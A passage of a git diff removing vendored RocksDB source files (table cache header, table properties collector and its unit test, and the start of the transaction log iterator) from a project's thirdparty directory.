-  TableReader* GetTableReaderFromHandle(Cache::Handle* handle);
-
-  // Get the table properties of a given table.
-  // @no_io: indicates if we should load table to the cache if it is not present
-  //         in table cache yet.
-  // @returns: `properties` will be reset on success. Please note that we will
-  //            return Status::Incomplete() if table is not present in cache and
-  //            we set `no_io` to be true.
-  Status GetTableProperties(const EnvOptions& toptions,
-                            const InternalKeyComparator& internal_comparator,
-                            const FileDescriptor& file_meta,
-                            std::shared_ptr<const TableProperties>* properties,
-                            bool no_io = false);
-
-  // Return total memory usage of the table reader of the file.
-  // 0 if table reader of the file is not loaded.
-  size_t GetMemoryUsageByTableReader(
-      const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& fd);
-
-  // Release the handle from a cache
-  void ReleaseHandle(Cache::Handle* handle);
-
-  // Capacity of the backing Cache that indicates inifinite TableCache capacity.
-  // For example when max_open_files is -1 we set the backing Cache to this.
-  static const int kInfiniteCapacity = 0x400000;
-
- private:
-  // Build a table reader
-  Status GetTableReader(const EnvOptions& env_options,
-                        const InternalKeyComparator& internal_comparator,
-                        const FileDescriptor& fd, bool sequential_mode,
-                        size_t readahead, bool record_read_stats,
-                        HistogramImpl* file_read_hist,
-                        unique_ptr<TableReader>* table_reader,
-                        bool skip_filters = false, int level = -1,
-                        bool prefetch_index_and_filter_in_cache = true,
-                        bool for_compaction = false);
-
-  const ImmutableCFOptions& ioptions_;
-  const EnvOptions& env_options_;
-  Cache* const cache_;
-  std::string row_cache_id_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector.cc b/thirdparty/rocksdb/db/table_properties_collector.cc
deleted file mode 100644
index a1f4dba..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector.cc
+++ /dev/null
@@ -1,134 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/table_properties_collector.h"
-
-#include "db/dbformat.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key,
-                                                   const Slice& value,
-                                                   uint64_t file_size) {
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    return Status::InvalidArgument("Invalid internal key");
-  }
-
-  // Note: We count both, deletions and single deletions here.
-  if (ikey.type == ValueType::kTypeDeletion ||
-      ikey.type == ValueType::kTypeSingleDeletion) {
-    ++deleted_keys_;
-  } else if (ikey.type == ValueType::kTypeMerge) {
-    ++merge_operands_;
-  }
-
-  return Status::OK();
-}
-
-Status InternalKeyPropertiesCollector::Finish(
-    UserCollectedProperties* properties) {
-  assert(properties);
-  assert(properties->find(
-        InternalKeyTablePropertiesNames::kDeletedKeys) == properties->end());
-  assert(properties->find(InternalKeyTablePropertiesNames::kMergeOperands) ==
-         properties->end());
-
-  std::string val_deleted_keys;
-  PutVarint64(&val_deleted_keys, deleted_keys_);
-  properties->insert(
-      {InternalKeyTablePropertiesNames::kDeletedKeys, val_deleted_keys});
-
-  std::string val_merge_operands;
-  PutVarint64(&val_merge_operands, merge_operands_);
-  properties->insert(
-      {InternalKeyTablePropertiesNames::kMergeOperands, val_merge_operands});
-
-  return Status::OK();
-}
-
-UserCollectedProperties
-InternalKeyPropertiesCollector::GetReadableProperties() const {
-  return {{"kDeletedKeys", ToString(deleted_keys_)},
-          {"kMergeOperands", ToString(merge_operands_)}};
-}
-
-namespace {
-
-EntryType GetEntryType(ValueType value_type) {
-  switch (value_type) {
-    case kTypeValue:
-      return kEntryPut;
-    case kTypeDeletion:
-      return kEntryDelete;
-    case kTypeSingleDeletion:
-      return kEntrySingleDelete;
-    case kTypeMerge:
-      return kEntryMerge;
-    default:
-      return kEntryOther;
-  }
-}
-
-uint64_t GetUint64Property(const UserCollectedProperties& props,
-                           const std::string property_name,
-                           bool* property_present) {
-  auto pos = props.find(property_name);
-  if (pos == props.end()) {
-    *property_present = false;
-    return 0;
-  }
-  Slice raw = pos->second;
-  uint64_t val = 0;
-  *property_present = true;
-  return GetVarint64(&raw, &val) ? val : 0;
-}
-
-}  // namespace
-
-Status UserKeyTablePropertiesCollector::InternalAdd(const Slice& key,
-                                                    const Slice& value,
-                                                    uint64_t file_size) {
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    return Status::InvalidArgument("Invalid internal key");
-  }
-
-  return collector_->AddUserKey(ikey.user_key, value, GetEntryType(ikey.type),
-                                ikey.sequence, file_size);
-}
-
-Status UserKeyTablePropertiesCollector::Finish(
-    UserCollectedProperties* properties) {
-  return collector_->Finish(properties);
-}
-
-UserCollectedProperties
-UserKeyTablePropertiesCollector::GetReadableProperties() const {
-  return collector_->GetReadableProperties();
-}
-
-
-const std::string InternalKeyTablePropertiesNames::kDeletedKeys
-  = "rocksdb.deleted.keys";
-const std::string InternalKeyTablePropertiesNames::kMergeOperands =
-    "rocksdb.merge.operands";
-
-uint64_t GetDeletedKeys(
-    const UserCollectedProperties& props) {
-  bool property_present_ignored;
-  return GetUint64Property(props, InternalKeyTablePropertiesNames::kDeletedKeys,
-                           &property_present_ignored);
-}
-
-uint64_t GetMergeOperands(const UserCollectedProperties& props,
-                          bool* property_present) {
-  return GetUint64Property(
-      props, InternalKeyTablePropertiesNames::kMergeOperands, property_present);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector.h b/thirdparty/rocksdb/db/table_properties_collector.h
deleted file mode 100644
index d8cd756..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector.h
+++ /dev/null
@@ -1,137 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines a collection of statistics collectors.
-#pragma once
-
-#include "rocksdb/table_properties.h"
-
-#include <memory>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-struct InternalKeyTablePropertiesNames {
-  static const std::string kDeletedKeys;
-  static const std::string kMergeOperands;
-};
-
-// Base class for internal table properties collector.
-class IntTblPropCollector {
- public:
-  virtual ~IntTblPropCollector() {}
-  virtual Status Finish(UserCollectedProperties* properties) = 0;
-
-  virtual const char* Name() const = 0;
-
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) = 0;
-
-  virtual UserCollectedProperties GetReadableProperties() const = 0;
-
-  virtual bool NeedCompact() const { return false; }
-};
-
-// Factory for internal table properties collector.
-class IntTblPropCollectorFactory {
- public:
-  virtual ~IntTblPropCollectorFactory() {}
-  // has to be thread-safe
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) = 0;
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const = 0;
-};
-
-// Collecting the statistics for internal keys. Visible only by internal
-// rocksdb modules.
-class InternalKeyPropertiesCollector : public IntTblPropCollector {
- public:
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override;
-
-  virtual Status Finish(UserCollectedProperties* properties) override;
-
-  virtual const char* Name() const override {
-    return "InternalKeyPropertiesCollector";
-  }
-
-  UserCollectedProperties GetReadableProperties() const override;
-
- private:
-  uint64_t deleted_keys_ = 0;
-  uint64_t merge_operands_ = 0;
-};
-
-class InternalKeyPropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new InternalKeyPropertiesCollector();
-  }
-
-  virtual const char* Name() const override {
-    return "InternalKeyPropertiesCollectorFactory";
-  }
-};
-
-// When rocksdb creates a new table, it will encode all "user keys" into
-// "internal keys", which contains meta information of a given entry.
-//
-// This class extracts user key from the encoded internal key when Add() is
-// invoked.
-class UserKeyTablePropertiesCollector : public IntTblPropCollector {
- public:
-  // transfer of ownership
-  explicit UserKeyTablePropertiesCollector(TablePropertiesCollector* collector)
-      : collector_(collector) {}
-
-  virtual ~UserKeyTablePropertiesCollector() {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override;
-
-  virtual Status Finish(UserCollectedProperties* properties) override;
-
-  virtual const char* Name() const override { return collector_->Name(); }
-
-  UserCollectedProperties GetReadableProperties() const override;
-
-  virtual bool NeedCompact() const override {
-    return collector_->NeedCompact();
-  }
-
- protected:
-  std::unique_ptr<TablePropertiesCollector> collector_;
-};
-
-class UserKeyTablePropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  explicit UserKeyTablePropertiesCollectorFactory(
-      std::shared_ptr<TablePropertiesCollectorFactory> user_collector_factory)
-      : user_collector_factory_(user_collector_factory) {}
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    TablePropertiesCollectorFactory::Context context;
-    context.column_family_id = column_family_id;
-    return new UserKeyTablePropertiesCollector(
-        user_collector_factory_->CreateTablePropertiesCollector(context));
-  }
-
-  virtual const char* Name() const override {
-    return user_collector_factory_->Name();
-  }
-
- private:
-  std::shared_ptr<TablePropertiesCollectorFactory> user_collector_factory_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector_test.cc b/thirdparty/rocksdb/db/table_properties_collector_test.cc
deleted file mode 100644
index 66c66c0..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector_test.cc
+++ /dev/null
@@ -1,499 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <map>
-#include <memory>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_builder.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class TablePropertiesTest : public testing::Test,
-                            public testing::WithParamInterface<bool> {
- public:
-  virtual void SetUp() override { backward_mode_ = GetParam(); }
-
-  bool backward_mode_;
-};
-
-// Utilities test functions
-namespace {
-static const uint32_t kTestColumnFamilyId = 66;
-static const std::string kTestColumnFamilyName = "test_column_fam";
-
-void MakeBuilder(const Options& options, const ImmutableCFOptions& ioptions,
-                 const InternalKeyComparator& internal_comparator,
-                 const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-                     int_tbl_prop_collector_factories,
-                 std::unique_ptr<WritableFileWriter>* writable,
-                 std::unique_ptr<TableBuilder>* builder) {
-  unique_ptr<WritableFile> wf(new test::StringSink);
-  writable->reset(new WritableFileWriter(std::move(wf), EnvOptions()));
-  int unknown_level = -1;
-  builder->reset(NewTableBuilder(
-      ioptions, internal_comparator, int_tbl_prop_collector_factories,
-      kTestColumnFamilyId, kTestColumnFamilyName,
-      writable->get(), options.compression, options.compression_opts,
-      unknown_level));
-}
-}  // namespace
-
-// Collects keys that starts with "A" in a table.
-class RegularKeysStartWithA: public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-     std::string encoded;
-     std::string encoded_num_puts;
-     std::string encoded_num_deletes;
-     std::string encoded_num_single_deletes;
-     std::string encoded_num_size_changes;
-     PutVarint32(&encoded, count_);
-     PutVarint32(&encoded_num_puts, num_puts_);
-     PutVarint32(&encoded_num_deletes, num_deletes_);
-     PutVarint32(&encoded_num_single_deletes, num_single_deletes_);
-     PutVarint32(&encoded_num_size_changes, num_size_changes_);
-     *properties = UserCollectedProperties{
-         {"TablePropertiesTest", message_},
-         {"Count", encoded},
-         {"NumPuts", encoded_num_puts},
-         {"NumDeletes", encoded_num_deletes},
-         {"NumSingleDeletes", encoded_num_single_deletes},
-         {"NumSizeChanges", encoded_num_size_changes},
-     };
-     return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    if (type == kEntryPut) {
-      num_puts_++;
-    } else if (type == kEntryDelete) {
-      num_deletes_++;
-    } else if (type == kEntrySingleDelete) {
-      num_single_deletes_++;
-    }
-    if (file_size < file_size_) {
-      message_ = "File size should not decrease.";
-    } else if (file_size != file_size_) {
-      num_size_changes_++;
-    }
-
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  std::string message_ = "Rocksdb";
-  uint32_t count_ = 0;
-  uint32_t num_puts_ = 0;
-  uint32_t num_deletes_ = 0;
-  uint32_t num_single_deletes_ = 0;
-  uint32_t num_size_changes_ = 0;
-  uint64_t file_size_ = 0;
-};
-
-// Collects keys that starts with "A" in a table. Backward compatible mode
-// It is also used to test internal key table property collector
-class RegularKeysStartWithABackwardCompatible
-    : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{{"TablePropertiesTest", "Rocksdb"},
-                                          {"Count", encoded}};
-    return Status::OK();
-  }
-
-  Status Add(const Slice& user_key, const Slice& value) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-};
-
-class RegularKeysStartWithAInternal : public IntTblPropCollector {
- public:
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{{"TablePropertiesTest", "Rocksdb"},
-                                          {"Count", encoded}};
-    return Status::OK();
-  }
-
-  Status InternalAdd(const Slice& user_key, const Slice& value,
-                     uint64_t file_size) override {
-    // simply asssume all user keys are not empty.
-    if (user_key.data()[0] == 'A') {
-      ++count_;
-    }
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-};
-
-class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory,
-                                     public TablePropertiesCollectorFactory {
- public:
-  explicit RegularKeysStartWithAFactory(bool backward_mode)
-      : backward_mode_(backward_mode) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    EXPECT_EQ(kTestColumnFamilyId, context.column_family_id);
-    if (!backward_mode_) {
-      return new RegularKeysStartWithA();
-    } else {
-      return new RegularKeysStartWithABackwardCompatible();
-    }
-  }
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new RegularKeysStartWithAInternal();
-  }
-  const char* Name() const override { return "RegularKeysStartWithA"; }
-
-  bool backward_mode_;
-};
-
-class FlushBlockEveryThreePolicy : public FlushBlockPolicy {
- public:
-  virtual bool Update(const Slice& key, const Slice& value) override {
-    return (++count_ % 3U == 0);
-  }
-
- private:
-  uint64_t count_ = 0;
-};
-
-class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory {
- public:
-  explicit FlushBlockEveryThreePolicyFactory() {}
-
-  const char* Name() const override {
-    return "FlushBlockEveryThreePolicyFactory";
-  }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const override {
-    return new FlushBlockEveryThreePolicy;
-  }
-};
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-namespace {
-void TestCustomizedTablePropertiesCollector(
-    bool backward_mode, uint64_t magic_number, bool test_int_tbl_prop_collector,
-    const Options& options, const InternalKeyComparator& internal_comparator) {
-  // make sure the entries will be inserted with order.
-  std::map<std::pair<std::string, ValueType>, std::string> kvs = {
-      {{"About   ", kTypeValue}, "val5"},  // starts with 'A'
-      {{"Abstract", kTypeValue}, "val2"},  // starts with 'A'
-      {{"Around  ", kTypeValue}, "val7"},  // starts with 'A'
-      {{"Beyond  ", kTypeValue}, "val3"},
-      {{"Builder ", kTypeValue}, "val1"},
-      {{"Love    ", kTypeDeletion}, ""},
-      {{"Cancel  ", kTypeValue}, "val4"},
-      {{"Find    ", kTypeValue}, "val6"},
-      {{"Rocks   ", kTypeDeletion}, ""},
-      {{"Foo     ", kTypeSingleDeletion}, ""},
-  };
-
-  // -- Step 1: build table
-  std::unique_ptr<TableBuilder> builder;
-  std::unique_ptr<WritableFileWriter> writer;
-  const ImmutableCFOptions ioptions(options);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  if (test_int_tbl_prop_collector) {
-    int_tbl_prop_collector_factories.emplace_back(
-        new RegularKeysStartWithAFactory(backward_mode));
-  } else {
-    GetIntTblPropCollectorFactory(ioptions, &int_tbl_prop_collector_factories);
-  }
-  MakeBuilder(options, ioptions, internal_comparator,
-              &int_tbl_prop_collector_factories, &writer, &builder);
-
-  SequenceNumber seqNum = 0U;
-  for (const auto& kv : kvs) {
-    InternalKey ikey(kv.first.first, seqNum++, kv.first.second);
-    builder->Add(ikey.Encode(), kv.second);
-  }
-  ASSERT_OK(builder->Finish());
-  writer->Flush();
-
-  // -- Step 2: Read properties
-  test::StringSink* fwf =
-      static_cast<test::StringSink*>(writer->writable_file());
-  std::unique_ptr<RandomAccessFileReader> fake_file_reader(
-      test::GetRandomAccessFileReader(
-          new test::StringSource(fwf->contents())));
-  TableProperties* props;
-  Status s = ReadTableProperties(fake_file_reader.get(), fwf->contents().size(),
-                                 magic_number, ioptions, &props);
-  std::unique_ptr<TableProperties> props_guard(props);
-  ASSERT_OK(s);
-
-  auto user_collected = props->user_collected_properties;
-
-  ASSERT_NE(user_collected.find("TablePropertiesTest"), user_collected.end());
-  ASSERT_EQ("Rocksdb", user_collected.at("TablePropertiesTest"));
-
-  uint32_t starts_with_A = 0;
-  ASSERT_NE(user_collected.find("Count"), user_collected.end());
-  Slice key(user_collected.at("Count"));
-  ASSERT_TRUE(GetVarint32(&key, &starts_with_A));
-  ASSERT_EQ(3u, starts_with_A);
-
-  if (!backward_mode && !test_int_tbl_prop_collector) {
-    uint32_t num_puts;
-    ASSERT_NE(user_collected.find("NumPuts"), user_collected.end());
-    Slice key_puts(user_collected.at("NumPuts"));
-    ASSERT_TRUE(GetVarint32(&key_puts, &num_puts));
-    ASSERT_EQ(7u, num_puts);
-
-    uint32_t num_deletes;
-    ASSERT_NE(user_collected.find("NumDeletes"), user_collected.end());
-    Slice key_deletes(user_collected.at("NumDeletes"));
-    ASSERT_TRUE(GetVarint32(&key_deletes, &num_deletes));
-    ASSERT_EQ(2u, num_deletes);
-
-    uint32_t num_single_deletes;
-    ASSERT_NE(user_collected.find("NumSingleDeletes"), user_collected.end());
-    Slice key_single_deletes(user_collected.at("NumSingleDeletes"));
-    ASSERT_TRUE(GetVarint32(&key_single_deletes, &num_single_deletes));
-    ASSERT_EQ(1u, num_single_deletes);
-
-    uint32_t num_size_changes;
-    ASSERT_NE(user_collected.find("NumSizeChanges"), user_collected.end());
-    Slice key_size_changes(user_collected.at("NumSizeChanges"));
-    ASSERT_TRUE(GetVarint32(&key_size_changes, &num_size_changes));
-    ASSERT_GE(num_size_changes, 2u);
-  }
-}
-}  // namespace
-
-TEST_P(TablePropertiesTest, CustomizedTablePropertiesCollector) {
-  // Test properties collectors with internal keys or regular keys
-  // for block based table
-  for (bool encode_as_internal : { true, false }) {
-    Options options;
-    BlockBasedTableOptions table_options;
-    table_options.flush_block_policy_factory =
-        std::make_shared<FlushBlockEveryThreePolicyFactory>();
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    test::PlainInternalKeyComparator ikc(options.comparator);
-    std::shared_ptr<TablePropertiesCollectorFactory> collector_factory(
-        new RegularKeysStartWithAFactory(backward_mode_));
-    options.table_properties_collector_factories.resize(1);
-    options.table_properties_collector_factories[0] = collector_factory;
-
-    TestCustomizedTablePropertiesCollector(backward_mode_,
-                                           kBlockBasedTableMagicNumber,
-                                           encode_as_internal, options, ikc);
-
-#ifndef ROCKSDB_LITE  // PlainTable is not supported in Lite
-    // test plain table
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 8;
-    plain_table_options.bloom_bits_per_key = 8;
-    plain_table_options.hash_table_ratio = 0;
-
-    options.table_factory =
-        std::make_shared<PlainTableFactory>(plain_table_options);
-    TestCustomizedTablePropertiesCollector(backward_mode_,
-                                           kPlainTableMagicNumber,
-                                           encode_as_internal, options, ikc);
-#endif  // !ROCKSDB_LITE
-  }
-}
-
-namespace {
-void TestInternalKeyPropertiesCollector(
-    bool backward_mode, uint64_t magic_number, bool sanitized,
-    std::shared_ptr<TableFactory> table_factory) {
-  InternalKey keys[] = {
-      InternalKey("A       ", 0, ValueType::kTypeValue),
-      InternalKey("B       ", 1, ValueType::kTypeValue),
-      InternalKey("C       ", 2, ValueType::kTypeValue),
-      InternalKey("W       ", 3, ValueType::kTypeDeletion),
-      InternalKey("X       ", 4, ValueType::kTypeDeletion),
-      InternalKey("Y       ", 5, ValueType::kTypeDeletion),
-      InternalKey("Z       ", 6, ValueType::kTypeDeletion),
-      InternalKey("a       ", 7, ValueType::kTypeSingleDeletion),
-      InternalKey("b       ", 8, ValueType::kTypeMerge),
-      InternalKey("c       ", 9, ValueType::kTypeMerge),
-  };
-
-  std::unique_ptr<TableBuilder> builder;
-  std::unique_ptr<WritableFileWriter> writable;
-  Options options;
-  test::PlainInternalKeyComparator pikc(options.comparator);
-
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  options.table_factory = table_factory;
-  if (sanitized) {
-    options.table_properties_collector_factories.emplace_back(
-        new RegularKeysStartWithAFactory(backward_mode));
-    // with sanitization, even regular properties collector will be able to
-    // handle internal keys.
-    auto comparator = options.comparator;
-    // HACK: Set options.info_log to avoid writing log in
-    // SanitizeOptions().
-    options.info_log = std::make_shared<test::NullLogger>();
-    options = SanitizeOptions("db",            // just a place holder
-                              options);
-    ImmutableCFOptions ioptions(options);
-    GetIntTblPropCollectorFactory(ioptions, &int_tbl_prop_collector_factories);
-    options.comparator = comparator;
-  } else {
-    int_tbl_prop_collector_factories.emplace_back(
-        new InternalKeyPropertiesCollectorFactory);
-  }
-  const ImmutableCFOptions ioptions(options);
-
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeBuilder(options, ioptions, pikc, &int_tbl_prop_collector_factories,
-                &writable, &builder);
-    for (const auto& k : keys) {
-      builder->Add(k.Encode(), "val");
-    }
-
-    ASSERT_OK(builder->Finish());
-    writable->Flush();
-
-    test::StringSink* fwf =
-        static_cast<test::StringSink*>(writable->writable_file());
-    unique_ptr<RandomAccessFileReader> reader(test::GetRandomAccessFileReader(
-        new test::StringSource(fwf->contents())));
-    TableProperties* props;
-    Status s =
-        ReadTableProperties(reader.get(), fwf->contents().size(), magic_number,
-                            ioptions, &props);
-    ASSERT_OK(s);
-
-    std::unique_ptr<TableProperties> props_guard(props);
-    auto user_collected = props->user_collected_properties;
-    uint64_t deleted = GetDeletedKeys(user_collected);
-    ASSERT_EQ(5u, deleted);  // deletes + single-deletes
-
-    bool property_present;
-    uint64_t merges = GetMergeOperands(user_collected, &property_present);
-    ASSERT_TRUE(property_present);
-    ASSERT_EQ(2u, merges);
-
-    if (sanitized) {
-      uint32_t starts_with_A = 0;
-      ASSERT_NE(user_collected.find("Count"), user_collected.end());
-      Slice key(user_collected.at("Count"));
-      ASSERT_TRUE(GetVarint32(&key, &starts_with_A));
-      ASSERT_EQ(1u, starts_with_A);
-
-      if (!backward_mode) {
-        uint32_t num_puts;
-        ASSERT_NE(user_collected.find("NumPuts"), user_collected.end());
-        Slice key_puts(user_collected.at("NumPuts"));
-        ASSERT_TRUE(GetVarint32(&key_puts, &num_puts));
-        ASSERT_EQ(3u, num_puts);
-
-        uint32_t num_deletes;
-        ASSERT_NE(user_collected.find("NumDeletes"), user_collected.end());
-        Slice key_deletes(user_collected.at("NumDeletes"));
-        ASSERT_TRUE(GetVarint32(&key_deletes, &num_deletes));
-        ASSERT_EQ(4u, num_deletes);
-
-        uint32_t num_single_deletes;
-        ASSERT_NE(user_collected.find("NumSingleDeletes"),
-                  user_collected.end());
-        Slice key_single_deletes(user_collected.at("NumSingleDeletes"));
-        ASSERT_TRUE(GetVarint32(&key_single_deletes, &num_single_deletes));
-        ASSERT_EQ(1u, num_single_deletes);
-      }
-    }
-  }
-}
-}  // namespace
-
-TEST_P(TablePropertiesTest, InternalKeyPropertiesCollector) {
-  TestInternalKeyPropertiesCollector(
-      backward_mode_, kBlockBasedTableMagicNumber, true /* sanitize */,
-      std::make_shared<BlockBasedTableFactory>());
-  if (backward_mode_) {
-    TestInternalKeyPropertiesCollector(
-        backward_mode_, kBlockBasedTableMagicNumber, false /* not sanitize */,
-        std::make_shared<BlockBasedTableFactory>());
-  }
-
-#ifndef ROCKSDB_LITE  // PlainTable is not supported in Lite
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 8;
-  plain_table_options.bloom_bits_per_key = 8;
-  plain_table_options.hash_table_ratio = 0;
-
-  TestInternalKeyPropertiesCollector(
-      backward_mode_, kPlainTableMagicNumber, false /* not sanitize */,
-      std::make_shared<PlainTableFactory>(plain_table_options));
-#endif  // !ROCKSDB_LITE
-}
-
-INSTANTIATE_TEST_CASE_P(InternalKeyPropertiesCollector, TablePropertiesTest,
-                        ::testing::Bool());
-
-INSTANTIATE_TEST_CASE_P(CustomizedTablePropertiesCollector, TablePropertiesTest,
-                        ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/transaction_log_impl.cc b/thirdparty/rocksdb/db/transaction_log_impl.cc
deleted file mode 100644
index e22c0c4..0000000
--- a/thirdparty/rocksdb/db/transaction_log_impl.cc
+++ /dev/null
@@ -1,272 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "db/transaction_log_impl.h"
-#include <inttypes.h>
-#include "db/write_batch_internal.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-TransactionLogIteratorImpl::TransactionLogIteratorImpl(
-    const std::string& dir, const ImmutableDBOptions* options,
-    const TransactionLogIterator::ReadOptions& read_options,
-    const EnvOptions& soptions, const SequenceNumber seq,
-    std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions)
-    : dir_(dir),
-      options_(options),
-      read_options_(read_options),
-      soptions_(soptions),
-      startingSequenceNumber_(seq),
-      files_(std::move(files)),
-      started_(false),
-      isValid_(false),
-      currentFileIndex_(0),
-      currentBatchSeq_(0),
-      currentLastSeq_(0),
-      versions_(versions) {
-  assert(files_ != nullptr);
-  assert(versions_ != nullptr);
-
-  reporter_.env = options_->env;
-  reporter_.info_log = options_->info_log.get();
-  SeekToStartSequence(); // Seek till starting sequence
-}
-
-Status TransactionLogIteratorImpl::OpenLogFile(
-    const LogFile* logFile, unique_ptr<SequentialFileReader>* file_reader) {
-  Env* env = options_->env;
-  unique_ptr<SequentialFile> file;
-  Status s;
-  EnvOptions optimized_env_options = env->OptimizeForLogRead(soptions_);
-  if (logFile->Type() == kArchivedLogFile) {
-    std::string fname = ArchivedLogFileName(dir_, logFile->LogNumber());
-    s = env->NewSequentialFile(fname, &file, optimized_env_options);
-  } else {
-    std::string fname = LogFileName(dir_, logFile->LogNumber());
-    s = env->NewSequentialFile(fname, &file, optimized_env_options);
-    if (!s.ok()) {
-      //  If cannot open file in DB directory.
-      //  Try the archive dir, as it could have moved in the meanwhile.
-      fname = ArchivedLogFileName(dir_, logFile->LogNumber());
-      s = env->NewSequentialFile(fname, &file, optimized_env_options);
-    }
-  }
-  if (s.ok()) {
-    file_reader->reset(new SequentialFileReader(std::move(file)));
-  }
-  return s;
-}
-
-BatchResult TransactionLogIteratorImpl::GetBatch()  {
-  assert(isValid_);  //  cannot call in a non valid state.
-  BatchResult result;
-  result.sequence = currentBatchSeq_;
-  result.writeBatchPtr = std::move(currentBatch_);
-  return result;
-}
-
-Status TransactionLogIteratorImpl::status() {
-  return currentStatus_;
-}
-
-bool TransactionLogIteratorImpl::Valid() {
-  return started_ && isValid_;
-}
-
-bool TransactionLogIteratorImpl::RestrictedRead(
-    Slice* record,
-    std::string* scratch) {
-  // Don't read if no more complete entries to read from logs
-  if (currentLastSeq_ >= versions_->LastSequence()) {
-    return false;
-  }
-  return currentLogReader_->ReadRecord(record, scratch);
-}
-
-void TransactionLogIteratorImpl::SeekToStartSequence(
